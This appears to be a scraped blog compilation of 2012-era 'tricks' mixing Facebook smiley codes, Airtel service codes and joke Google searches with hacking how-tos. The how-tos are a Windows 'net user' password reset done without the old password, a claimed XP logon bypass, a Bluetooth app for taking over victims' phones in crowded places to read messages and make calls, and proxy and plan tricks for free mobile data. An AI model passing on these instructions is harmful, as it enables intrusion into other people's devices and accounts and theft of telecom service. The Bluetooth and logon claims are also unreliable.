Be The Bot fools the site to thinking that Google Crawler Bot is accessing it. And hence, you’ll get a view of the ‘real’ site via Be The Bot.


change your computer's password without knowing the old one

open cmd
type net user
then type net user (account name you want to reset) * (eg- net user bikram *)
then type the password you want (the password you will type will not be shown) hit enter
then confirm password & hit enter
DONE!!



hack windows xp at logon screen

at the logon screen press ALT +CTRL+DEL (2 times) then in the user name field type administrator  & leave the password field blank . Now hit enter
DONE!!


how to check the ip address of any website

Connect to the internet
open command promt
type- ping www.websitename.com
 DONE!!


Awesome New Smiley Codes List for Facebook 2012

[[f9.laugh]]
[[f9.sad]]
[[f9.angry]]
[[f9.sleepy]]
[[f9.shock]]
[[f9.kiss]]
[[f9.inlove]]
[[f9.pizza]]
[[f9.coffee]]
[[f9.rain]]
[[f9.bomb]]
[[f9.sun]]
[[f9.heart]]
[[f9.heartbreak]]
[[f9.doctor]]
[[f9.ghost]]
[[f9.brb]]
[[f9.wine]]
[[f9.gift]]
[[f9.adore]]
[[f9.angel]]
[[f9.baloons]]
[[f9.bowl]]
[[f9.cake]]
[[f9.callme]]
[[f9.clap]]
[[f9.confused]]
[[f9.curllip]]
[[f9.devilface]]
[[f9.lying]]
[[f9.rofl]]
[[f9.billiard]]
[[f9.cakepiece]]
[[f9.rosedown]]
[[f9.shutmouth]]
[[f9.shy]]
[[f9.silly]]
[[f9.tongue1]]
[[f9.fastfood]]
[[f9.ring]]
[[f9.plate]]
[[f9.candle]]
[[f9.party]]


Airtel Codes


# To Do The Code What Code Does
1 Call 121 Customer Care
2 Call 1909 Activate or Deactivate DND Service
3 Dial *123# Balance Enquiry
4 Dial *121*5# Deactivating Services
5 Dial *555# NOP Service
6 Dial *222# Special 5 Offers
7 Dial *141# Airtel Gift Service
8 Dial *325# Free Facebook Access 1Rs./Day
9 Dial *515# Twitter Service
10 Dial *121# Airtel my Offers
11 Dial *123*7# and *123*10# Checking GPRS Balances
12 Dial *125*5# Daily GPRS Pack 5Rs./Day
13 Dial *567# MO Activation or Deactivation
14 Dial 198 Lodging Complaints
15 Dial 123 Recharging Account
16 Dial *566# Must Buy Service
17 Dial 198p2p1p4p2 Direct Calling Customer Care
18 Dial *123*11# Checking 3G Data Balance
19 Send All to 543210 GPRS Settings
20 Send LIVE to 52567 Airtel Live Settings
21 Send MRP FULLTT to 51619 Full Talk-time Offers
22 Send MRP TRF to 51619 Tariff Plans
23 Send MRP SMS to 51619 SMS Packs
24 Send MRP GPRS to 51619 GPRS Packs
25 Send 3G to 121 Activating 3G Packs
26 Send START to 121/1210 Start Any Service
27 Send STOP to 121/1210 Stop Any Service
28 Send PORT to 1900 Mobile Portability Service



REMOTE CONTROL OVER BLUETOOTH MOBILE PHONE DOWNLOAD SUPER BLUETOOTH HACK JAVA BLUETOOTH HACKING

Download : super bluetooth hack go to getjar.com
and search for super bluetooth and get it on your
mobile
Now switch your bluetooth on and open
this app downloaded (The victims mobile bluetooth must be on.) Connect your mobile to
victims mobile. To connect open downloaded app
and choose connect then it will search then it will
show the people whose mobile bluetooth is on.
select your victim and connect to him. at the time of
connection the victim must accept your request the app won't show your mobile is going to hack it
will show like "connect to the access point" if victim
accepts from then his mobile is in your control till he
switch his bluetooth off. you can switch his cell
phone off, you can call a number from his mobile
phone,you can hang a call , you can read his sms , and do lots of crazy things enjoy
The place for hacking is crowded place most of the phones bluetooth will be ON
The best thing is china mobile phones doesn't need the accept the request. It will automatically accept the request in DUM profile so its easy to hack china mobile phones..


HACK BSNL 3G

HACK BSNL 3G

1. Brand New BSNL 3G sim
2. 3G handset (any cheap model will do)
Steps :
1. Go to a BSNL outlet and ask for a 3G sim.
2. Then recharge it with Rs. 120 in which you’ll get Rs. 20 balance & 6 months validity.
3. Then convert it to 2G by recharging it with Rs. 2.
4. Then activate Unlimited GPRS plan for 2G on your card by recharging Rs. 274.
5. Now in your Handset, set access point as bsnlnet .
The work is done now !
Now use unlimited GPRS with speed of 3G :)
100% WORKING


Airtel Free 3G Hacking Proxy Trick March 2012



Proxy : 208.77.23.4


Port : 80 
 

Home Page : fb.me
If Its Not Working Try live.airtelworld.com 
 

Use Mozilla For Better Speed In Pc

You Can Use This Proxy In IDM Too


funny things about google

1. Who is a failure ?

Just type in ” who is a failure ? ” in the Google search box and hit enter. And the first result is…well..see it for yourself. :)
google-weird-search-1


2. Search

If you type the word ‘ search ‘ in the Google search box and hit enter, the weird thing is that Google itself shows up probably in page 2 or 3. And the first result is Microsoft’s Live Search !! I know that the algorithm has to do something with it, but still Google should be the first result because that’s what people associate the word ‘ search ‘ with.
google-weird-search-2


3. Achieving

This one is really hilarious and probably the most desired one too. Type the word ‘ achieving ‘ in Google search box and see the first result. LOL !
google-weird-search-3


4. What to do if….

Ask Google what to do if inside of the grill goes wet. Well, I think Google is pretty good at assuming things too…spot on ! :)
google-weird-search-4


5. Find Chuck Norris

So you wanna find Chuck, huh ? Type it in Google and click on I’m feeling lucky, and then see what it has to say :) ( It’s actually a site created probably by a Chuck fan. Neat idea ! )
google-weird-search-5
google-weird-search-6